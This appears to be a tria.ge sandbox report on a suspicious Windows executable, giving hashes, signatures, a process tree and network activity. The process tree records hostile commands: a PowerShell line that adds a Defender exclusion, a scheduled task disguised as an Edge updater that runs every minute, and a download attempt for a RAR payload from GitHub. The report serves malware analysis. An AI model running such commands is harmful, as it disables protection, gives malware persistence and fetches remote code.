Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    141s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags
    arch:x64, arch:x86, image:win7-20230712-en, locale:en-us, os:windows7-x64, system
  • submitted
    08/08/2023, 18:13 UTC

General

  • Target

    a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe

  • Size

    2.1MB

  • MD5

    dd8a9df687159b7b689e39f52ea24e59

  • SHA1

    4725058cb525289ac4dea8a90c2ff70ce110b77a

  • SHA256

    a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4

  • SHA512

    3b1fd10bde94721e1b5e33bc0380680b0ddfdc4616d6ee0eeb5201812ea9117f49a5b094507ae4b5aaf78e681eb1c240fbabf6c4a33f1d3d26bf91958b9c131a

  • SSDEEP

    49152:Yb6L/TPtEcWM0kZLH4rYZZFeEcvAJaU2hVv:YuTucmY1ZFm

Score
3/10

Malware Config

Signatures

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
    "C:\Users\Admin\AppData\Local\Temp\a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious behavior: RenamesItself
    • Suspicious use of WriteProcessMemory
    PID:1036
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Local\Temp\\\""
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2000
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /C SCHTASKS /Create /SC MINUTE /TN MicrosoftEdgeUpdateTaskMain /RL HIGHEST /TR C:\Users\Admin\AppData\Local\Temp\a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe /F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2396
      • C:\Windows\SysWOW64\schtasks.exe
        SCHTASKS /Create /SC MINUTE /TN MicrosoftEdgeUpdateTaskMain /RL HIGHEST /TR C:\Users\Admin\AppData\Local\Temp\a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe /F
        3⤵
        • Creates scheduled task(s)
        PID:1424
    • C:\Windows\SysWOW64\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      2⤵
      • Detects videocard installed
      • Suspicious use of AdjustPrivilegeToken
      PID:2524
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 896
      2⤵
      • Program crash
      PID:3068
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {22C91869-F9C5-4297-A4A6-F86CB475C3E0} S-1-5-21-1014134971-2480516131-292343513-1000:NYBYVYTJ\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2808
    • C:\Users\Admin\AppData\Local\Temp\a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
      C:\Users\Admin\AppData\Local\Temp\a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
      2⤵
      PID:2888
    • C:\Users\Admin\AppData\Local\Temp\a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
      C:\Users\Admin\AppData\Local\Temp\a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
      2⤵
      PID:2512

Network

  • flag-us
    DNS
    github.com
    a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
    Remote address:
    8.8.8.8:53
    Request
    github.com
    IN A
    Response
    github.com
    IN A
    140.82.114.3
  • flag-us
    GET
    https://github.com/abjula/server/raw/main/2.rar
    a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
    Remote address:
    140.82.114.3:443
    Request
    GET /abjula/server/raw/main/2.rar HTTP/1.1
    accept: */*
    host: github.com
    Response
    HTTP/1.1 404 Not Found
    Server: GitHub.com
    Date: Tue, 08 Aug 2023 18:13:35 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
    Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ wss://*.actions.githubusercontent.com github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com objects-origin.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
    Transfer-Encoding: chunked
    X-GitHub-Request-Id: C030:41F8:10CA607:18712CF:64D285CE
  • 140.82.114.3:443
    https://github.com/abjula/server/raw/main/2.rar
    tls, http
    a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
    5.2kB
    237.8kB
    104
    178

    HTTP Request

    GET https://github.com/abjula/server/raw/main/2.rar

    HTTP Response

    404
  • 8.8.8.8:53
    github.com
    dns
    a00e0ffba9c2c81ef3a2f30a3fab80606bb943f9bf30233d3c26dd14c3a795c4exe_JC.exe
    56 B
    72 B
    1
    1

    DNS Request

    github.com

    DNS Response

    140.82.114.3

MITRE ATT&CK Enterprise v15

Downloads

  • memory/1036-65-0x00000000009B0000-0x0000000000BC9000-memory.dmp

    Filesize

    2.1MB

  • memory/1036-66-0x00000000009B0000-0x0000000000BC9000-memory.dmp

    Filesize

    2.1MB

  • memory/2000-56-0x0000000073E00000-0x00000000743AB000-memory.dmp

    Filesize

    5.7MB

  • memory/2000-57-0x0000000073E00000-0x00000000743AB000-memory.dmp

    Filesize

    5.7MB

  • memory/2000-58-0x0000000002680000-0x00000000026C0000-memory.dmp

    Filesize

    256KB

  • memory/2000-59-0x0000000002680000-0x00000000026C0000-memory.dmp

    Filesize

    256KB

  • memory/2000-60-0x0000000073E00000-0x00000000743AB000-memory.dmp

    Filesize

    5.7MB

  • memory/2512-75-0x00000000009B0000-0x0000000000BC9000-memory.dmp

    Filesize

    2.1MB

  • memory/2888-68-0x00000000009B0000-0x0000000000BC9000-memory.dmp

    Filesize

    2.1MB